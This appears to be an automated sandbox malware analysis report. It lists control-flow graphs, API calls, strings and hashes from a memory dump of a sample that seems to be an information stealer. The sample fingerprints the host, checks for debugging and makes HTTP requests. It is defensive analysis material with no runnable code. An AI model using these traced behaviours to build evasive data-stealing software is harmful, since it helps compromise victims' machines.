            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040476E
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404672
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046B2
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046FC
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046A7
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040462D
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404763
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047AA
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404643
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046BD
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047C0
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404712
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404638
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404617
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404667
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047CB
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046D3
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404707
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404693
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404728
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040479F
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404688
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040471D
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040478F
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404784
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047B5
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404622
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404779
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040467D
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046C8
            Memory Dump Source
            • Source File: 00000003.00000002.1706437734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
            • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
            • API String ID: 2127927946-2218711628
            • Opcode ID: e597e8fc72bf404d1b85c08bbf82363fdc41d925fce3c21812b4f2230c6aabb6
            • Instruction ID: 04d817b79848fc48b59ba69504da24c7d1b3191c531f4b94b2025844f93bc58f
            • Opcode Fuzzy Hash: e597e8fc72bf404d1b85c08bbf82363fdc41d925fce3c21812b4f2230c6aabb6
            • Instruction Fuzzy Hash: E941BB79740624EBC71C9FE5EC89B987F71AB4C712BA0C062F90299190C7F9D5019B3D

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 725 4062d0-40635b call 41a170 call 404800 call 41a110 InternetOpenA 733 406364-406368 725->733 734 40635d 725->734 735 406559-406575 call 41a170 call 41a1d0 * 2 733->735 736 40636e-406392 InternetConnectA 733->736 734->733 752 406578-40657d 735->752 738 406398-40639c 736->738 739 40654f-406552 736->739 740 4063aa 738->740 741 40639e-4063a8 738->741 739->735 743 4063b4-4063e2 HttpOpenRequestA 740->743 741->743 746 406545-406548 743->746 747 4063e8-4063ec 743->747 746->739 749 406415-406455 HttpSendRequestA 747->749 750 4063ee-40640e 747->750 754 406457-406477 call 41a110 call 41a1d0 * 2 749->754 755 40647c-40649b call 4183e0 749->755 750->749 754->752 760 406519-406539 call 41a110 call 41a1d0 * 2 755->760 761 40649d-4064a4 755->761 760->752 764 4064a6-4064d0 InternetReadFile 761->764 765 406517-40653e 761->765 768 4064d2-4064d9 764->768 769 4064db 764->769 765->746 768->769 773 4064dd-406515 call 41a380 call 41a270 call 41a1d0 768->773 769->765 773->764
            APIs
              • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
              • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
              • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
              • Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899
            • InternetOpenA.WININET(00420DE6,00000001,00000000,00000000,00000000,00420DE3), ref: 00406331
            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406385
            • HttpOpenRequestA.WININET(00000000,GET,?,?,00000000,00000000,00400100,00000000), ref: 004063D5
            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406421
            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004064BD
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1706437734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: Internet$??2@$HttpOpenRequest$ConnectCrackFileReadSend
            • String ID: ERROR$ERROR$GET
            • API String ID: 1095854997-2509457195
            • Opcode ID: 37c9a35f6efc1406ab06139e2c56cf7233533a6dde65a2729a3abd1b6f546bcc
            • Instruction ID: cbac5eee591d607aa173065357eefb87c001816e051c1cde1c99a9b9dc38779b
            • Opcode Fuzzy Hash: 37c9a35f6efc1406ab06139e2c56cf7233533a6dde65a2729a3abd1b6f546bcc
            • Instruction Fuzzy Hash: AA719F71A00218EBDB24DFA0DC49FEEB775AF44704F1080AAF50A6B1D0DBB86A85CF55
            APIs
            • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041733F
            Memory Dump Source
            • Source File: 00000003.00000002.1706437734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: NameUser
            • String ID:
            • API String ID: 2645101109-0
            • Opcode ID: 964d200717a0df2f3f62487d6067e07b9107b608128a919957ff18d07be4aa47
            • Instruction ID: d97db1a59c4db881a004fd13fa95f43a4b4e799dc382b7b3ddd968380e0460c3
            • Opcode Fuzzy Hash: 964d200717a0df2f3f62487d6067e07b9107b608128a919957ff18d07be4aa47
            • Instruction Fuzzy Hash: B6F04FB1944648AFC710DF98DD45BAEBBB9FB08B21F10021AFA15A3690C7745545CBA1
            APIs
            • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,004164B7,00420ADA), ref: 0040116A
            Memory Dump Source
            • Source File: 00000003.00000002.1706437734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: InfoSystem
            • String ID:
            • API String ID: 31276548-0
            • Opcode ID: fb17d3f43d2abce587f83b1d922277e93116013ddf9f148f75be850ad6644e92
            • Instruction ID: 6710e554edad90447a57410479f56be173a40300ace114c8cd68aa34356edfab
            • Opcode Fuzzy Hash: fb17d3f43d2abce587f83b1d922277e93116013ddf9f148f75be850ad6644e92
            • Instruction Fuzzy Hash: 17D05E74D0020CDBCB14DFE09A49ADDBB7AAB0D321F001656ED0572240DA305446CA65

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 784 4195e0-4195ea 785 4195f0-419a01 784->785 786 419a06-419a9a LoadLibraryA * 5 784->786 785->786 793 419b16-419b1d 786->793 794 419a9c-419b11 786->794 796 419b23-419be1 793->796 797 419be6-419bed 793->797 794->793 796->797 798 419c68-419c6f 797->798 799 419bef-419c63 797->799 801 419c75-419d02 798->801 802 419d07-419d0e 798->802 799->798 801->802 806 419d14-419dea 802->806 807 419def-419df6 802->807 806->807 809 419e72-419e79 807->809 810 419df8-419e6d 807->810 815 419e7b-419ea7 809->815 816 419eac-419eb3 809->816 810->809 815->816 819 419ee5-419eec 816->819 820 419eb5-419ee0 816->820 826 419fe2-419fe9 819->826 827 419ef2-419fdd 819->827 820->819 832 419feb-41a048 826->832 833 41a04d-41a054 826->833 827->826 832->833 838 41a056-41a069 833->838 839 41a06e-41a075 833->839 838->839 849 41a077-41a0d3 839->849 850 41a0d8-41a0d9 839->850 849->850
            APIs
            • LoadLibraryA.KERNEL32(?,?,00415783,?,00000034,00000064,004160A0,?,0000002C,00000064,00416040,?,00000030,00000064,Function_000155B0,?), ref: 00419A0D
            • LoadLibraryA.KERNEL32(?,?,00415783,?,00000034,00000064,004160A0,?,0000002C,00000064,00416040,?,00000030,00000064,Function_000155B0,?), ref: 00419A1E
            • LoadLibraryA.KERNEL32(?,?,00415783,?,00000034,00000064,004160A0,?,0000002C,00000064,00416040,?,00000030,00000064,Function_000155B0,?), ref: 00419A42
            • LoadLibraryA.KERNEL32(?,?,00415783,?,00000034,00000064,004160A0,?,0000002C,00000064,00416040,?,00000030,00000064,Function_000155B0,?), ref: 00419A77
            • LoadLibraryA.KERNEL32(?,?,00415783,?,00000034,00000064,004160A0,?,0000002C,00000064,00416040,?,00000030,00000064,Function_000155B0,?), ref: 00419A88
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1706437734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: LibraryLoad
            • String ID: HttpQueryInfoA$InternetSetOptionA
            • API String ID: 1029625771-1775429166
            • Opcode ID: 42a1c126b23ada8373e6c48d5b9de957363c63bf0e0344acec6b940ad07a1c70
            • Instruction ID: de404ee9f47513f53d28e8016dc56f999ad60f1515a6c9981bc8237813ea7153
            • Opcode Fuzzy Hash: 42a1c126b23ada8373e6c48d5b9de957363c63bf0e0344acec6b940ad07a1c70
            • Instruction Fuzzy Hash: 946243B5500E00AFC774DFA8EE88D1E3BABBB8C761750A51AE609C3674D7349443DBA4

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 918 4048d0-404992 call 41a170 call 404800 call 41a110 * 5 935 404994 918->935 936 40499b-40499f 918->936 935->936 937 4049a5-404b1d call 418600 call 41a2f0 call 41a270 call 41a1d0 * 2 call 41a380 call 41a270 call 41a1d0 call 41a380 call 41a270 call 41a1d0 call 41a2f0 call 41a270 call 41a1d0 call 41a380 call 41a270 call 41a1d0 call 41a380 call 41a270 call 41a1d0 call 41a380 call 41a2f0 call 41a270 call 41a1d0 * 2 936->937 938 404f1b-404f43 call 41a4a0 call 409b10 936->938 937->938 1026 404b23-404b27 937->1026 951 404f82-404ff2 call 418430 * 2 call 41a170 call 41a1d0 * 8 938->951 952 404f45-404f7d call 41a1f0 call 41a380 call 41a270 call 41a1d0 938->952 952->951 1027 404b35 1026->1027 1028 404b29-404b33 1026->1028 1029 404b3f-404b72 1027->1029 1028->1029 1031 404b78-404e78 call 41a380 call 41a270 call 41a1d0 call 41a2f0 call 41a270 call 41a1d0 call 41a380 call 41a270 call 41a1d0 call 41a380 call 41a270 call 41a1d0 call 41a380 call 41a270 call 41a1d0 call 41a380 call 41a270 call 41a1d0 call 41a2f0 call 41a270 call 41a1d0 call 41a380 call 41a270 call 41a1d0 call 41a380 call 41a270 call 41a1d0 call 41a2f0 call 41a270 call 41a1d0 call 41a380 call 41a270 call 41a1d0 call 41a380 call 41a270 call 41a1d0 call 41a380 call 41a270 call 41a1d0 call 41a380 call 41a270 call 41a1d0 call 41a2f0 call 41a270 call 41a1d0 call 41a110 call 41a2f0 * 2 call 41a270 call 41a1d0 * 2 call 41a4a0 * 4 1029->1031 1032 404f0e-404f14 1029->1032 1146 404e82-404eac 1031->1146 1032->938 1148 404eb7-404f09 InternetCloseHandle call 41a1d0 1146->1148 1149 404eae-404eb5 1146->1149 1148->1032 1149->1148 1150 404eb9-404ef7 call 41a380 call 41a270 call 41a1d0 1149->1150 1150->1146
            APIs
              • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
              • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
              • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
              • Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899
            • InternetCloseHandle.WININET(00000000), ref: 00404EFD
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1706437734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: ??2@$Internet$CloseCrackHandle
            • String ID: "$"$------$------$------
            • API String ID: 3842476067-2180234286
            • Opcode ID: 708755aed416520086e08f34001f7f397d5272e2906fc1d4a52a7c1cce2566f0
            • Instruction ID: 96828d9d4da3c69e3e13a7d192eb2c0d5cb14303612463eff3b0a86b38ab5adb
            • Opcode Fuzzy Hash: 708755aed416520086e08f34001f7f397d5272e2906fc1d4a52a7c1cce2566f0
            • Instruction Fuzzy Hash: 7B124E71912118AACB14EB91DC96FEEB339AF14314F50419EF50662091EF782F98CF6A

            Control-flow Graph

            APIs
            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
            • InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1706437734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: ??2@$CrackInternet
            • String ID: <
            • API String ID: 676793843-4251816714
            • Opcode ID: 2f4ab3673443420506f52f30828b11760ea29e85b2ca068c11f228e25f55c4dd
            • Instruction ID: 93cf72731df314aae8b190796811ac6c8ed605cccc68025416595ba5c6ffb16c
            • Opcode Fuzzy Hash: 2f4ab3673443420506f52f30828b11760ea29e85b2ca068c11f228e25f55c4dd
            • Instruction Fuzzy Hash: 0A2129B1D00208ABDF14DFA5E849ADD7B75FF44364F108229F926A72D0DB706A05CF95

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 1387 4112b0-4112dd call 41a4a0 1391 4112e7-411301 call 41a4a0 strtok_s 1387->1391 1392 4112df-4112e1 ExitProcess 1387->1392 1395 411304-411308 1391->1395 1396 4114d2-4114dd call 41a1d0 1395->1396 1397 41130e-411321 1395->1397 1399 411327-41132a 1397->1399 1400 4114ae-4114cd strtok_s 1397->1400 1402 411401-411412 1399->1402 1403 411461-411472 1399->1403 1404 411480-411491 1399->1404 1405 411423-411434 1399->1405 1406 411442-411453 1399->1406 1407 411345-411354 call 41a1f0 1399->1407 1408 41136d-41137e 1399->1408 1409 41138f-4113a0 1399->1409 1410 411331-411340 call 41a1f0 1399->1410 1411 411359-411368 call 41a1f0 1399->1411 1412 4113bd-4113ce 1399->1412 1413 4113df-4113f0 1399->1413 1414 41149f-4114a9 call 41a1f0 1399->1414 1400->1395 1433 411414-411417 1402->1433 1434 41141e 1402->1434 1441 411474-411477 1403->1441 1442 41147e 1403->1442 1445 411493-411496 1404->1445 1446 41149d 1404->1446 1435 411440 1405->1435 1436 411436-411439 1405->1436 1437 411455-411458 1406->1437 1438 41145f 1406->1438 1407->1400 1439 411380-411383 1408->1439 1440 41138a 1408->1440 1443 4113a2-4113ac 1409->1443 1444 4113ae-4113b1 1409->1444 1410->1400 1411->1400 1447 4113d0-4113d3 1412->1447 1448 4113da 1412->1448 1431 4113f2-4113f5 1413->1431 1432 4113fc 1413->1432 1414->1400 1431->1432 1432->1400 1433->1434 1434->1400 1435->1400 1436->1435 1437->1438 1438->1400 1439->1440 1440->1400 1441->1442 1442->1400 1449 4113b8 1443->1449 1444->1449 1445->1446 1446->1400 1447->1448 1448->1400 1449->1400
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1706437734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: strtok_s$ExitProcess
            • String ID: block
            • API String ID: 762877946-2199623458
            • Opcode ID: 1ba1f058e3e2379031d11e79f6d2bdd312730fa939e98f1981bd39696260f1a4
            • Instruction ID: b2aee4bd772402993bd8daf8ed4e127407cef198cc172b88b11a84757ccddcb3
            • Opcode Fuzzy Hash: 1ba1f058e3e2379031d11e79f6d2bdd312730fa939e98f1981bd39696260f1a4
            • Instruction Fuzzy Hash: 6451A574B00209EFDB14DFA0E944BEE37B5BF44B04F10804AE916A7361D778D996CB5A

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 1450 416fa0-416fea 1452 416ff3-417067 GetVolumeInformationA call 4187a0 * 3 1450->1452 1453 416fec 1450->1453 1460 417078-41707f 1452->1460 1453->1452 1461 417081-41709a call 4187a0 1460->1461 1462 41709c-4170b7 1460->1462 1461->1460 1468 4170b9-4170c6 call 41a110 1462->1468 1469 4170c8-4170f8 call 41a110 1462->1469 1474 41711e-41712e 1468->1474 1469->1474
            APIs
            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041701F
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1706437734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: InformationVolume
            • String ID: :$C$\
            • API String ID: 2039140958-3809124531
            • Opcode ID: b8d4498c9ef52ac0e7ff8a74a815c8f3508d9b1454889a6f46a668afd64d8a13
            • Instruction ID: 54c0e4e4c236f1d7f0585d8ba6b1fa909b8b3bfc40374ef6a46e6daa0de72561
            • Opcode Fuzzy Hash: b8d4498c9ef52ac0e7ff8a74a815c8f3508d9b1454889a6f46a668afd64d8a13
            • Instruction Fuzzy Hash: 1341B1B1D04248EBDB20DFA4CC45BEEBBB8AF08714F14009DF50967281D7786A84CBA9

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 1476 401220-401247 call 418450 GlobalMemoryStatusEx 1479 401273-40127a 1476->1479 1480 401249-401271 call 41d3f0 * 2 1476->1480 1482 401281-401285 1479->1482 1480->1482 1484 401287 1482->1484 1485 40129a-40129d 1482->1485 1486 401292 1484->1486 1487 401289-401290 1484->1487 1486->1485 1487->1485 1487->1486
            APIs
            • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
            • __aulldiv.LIBCMT ref: 00401258
            • __aulldiv.LIBCMT ref: 00401266
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1706437734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: __aulldiv$GlobalMemoryStatus
            • String ID: @
            • API String ID: 2185283323-2766056989
            • Opcode ID: ea570c17900da72c0ff61e466dfdba6c639ea0a5e55046902d87947f1e012f1f
            • Instruction ID: 3a295e2926d3a661784167dae5cc93d3585e5da9a2cb48fc087cd8b2851d2611
            • Opcode Fuzzy Hash: ea570c17900da72c0ff61e466dfdba6c639ea0a5e55046902d87947f1e012f1f
            • Instruction Fuzzy Hash: 8601FBB0D40308BAEB10EBE4DD49B9EBB78AB14705F20809EEA05B62D0D7785585875D

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 1490 419270-419284 call 419160 1493 4194a3-419502 LoadLibraryA * 2 1490->1493 1494 41928a-41949e call 419190 1490->1494 1502 419504-419518 1493->1502 1503 41951d-419524 1493->1503 1494->1493 1502->1503 1504 419556-41955d 1503->1504 1505 419526-419551 1503->1505 1508 419578-41957f 1504->1508 1509 41955f-419573 1504->1509 1505->1504 1512 419581-419594 1508->1512 1513 419599-4195a0 1508->1513 1509->1508 1512->1513 1514 4195d1-4195d2 1513->1514 1515 4195a2-4195cc 1513->1515 1515->1514
            APIs
            • LoadLibraryA.KERNEL32(?,?,004164A0), ref: 004194AA
            • LoadLibraryA.KERNEL32(?,?,004164A0), ref: 004194DF
            Strings
            • NtQueryInformationProcess, xrefs: 004195BA
            Memory Dump Source
            • Source File: 00000003.00000002.1706437734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: LibraryLoad
            • String ID: NtQueryInformationProcess
            • API String ID: 1029625771-2781105232
            • Opcode ID: 3c4f576e88d1023c8c64455e8d299a229b8a4e9f9ed258e654ba581a00c5eb17
            • Instruction ID: 826a308167d33dd6e89c68d84aa8ae535e40b86c028b310e96c4c1ecb1cfdbe7
            • Opcode Fuzzy Hash: 3c4f576e88d1023c8c64455e8d299a229b8a4e9f9ed258e654ba581a00c5eb17
            • Instruction Fuzzy Hash: D3A171B5500A00EFC764DF68ED88E1E3BBBBB4C361B50A51AEA05C3674D7349843DBA5

            Control-flow Graph

            APIs
              • Part of subcall function 00401160: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,004164B7,00420ADA), ref: 0040116A
              • Part of subcall function 00401110: VirtualAllocExNuma.KERNEL32(00000000,?,?,004164BC), ref: 00401132
              • Part of subcall function 00401220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
              • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401258
              • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401266
            • GetUserDefaultLCID.KERNEL32 ref: 004164C6
              • Part of subcall function 004172F0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041733F
              • Part of subcall function 00417380: GetComputerNameA.KERNEL32(?,00000104), ref: 004173CF
            Memory Dump Source
            • Source File: 00000003.00000002.1706437734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: NameUser__aulldiv$AllocComputerDefaultGlobalInfoMemoryNumaStatusSystemVirtual
            • String ID:
            • API String ID: 3178950686-0
            • Opcode ID: 097da323ac4eb8756f48a57aff9b622020cd776e5523750053ba436d79081546
            • Instruction ID: c6285a65dcb1a135c62ded655b7a731d229dd5b525af539dc0d6bcccc6ed86c8
            • Opcode Fuzzy Hash: 097da323ac4eb8756f48a57aff9b622020cd776e5523750053ba436d79081546
            • Instruction Fuzzy Hash: B0319230941108BACB04FBF1DC56BEE7339AF14318F10452EF91366092DFBC6985C66A
            APIs
            • GetComputerNameA.KERNEL32(?,00000104), ref: 004173CF
            Memory Dump Source
            • Source File: 00000003.00000002.1706437734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: ComputerName
            • String ID:
            • API String ID: 3545744682-0
            • Opcode ID: 9cad883e92767d667f7a3bd3c491df47bdb8f8355287bf46401cfbf98ae607a3
            • Instruction ID: 42712b1d228129e2e67f3f866f9c43061177fb5da2658b34d54d74d13c44c576
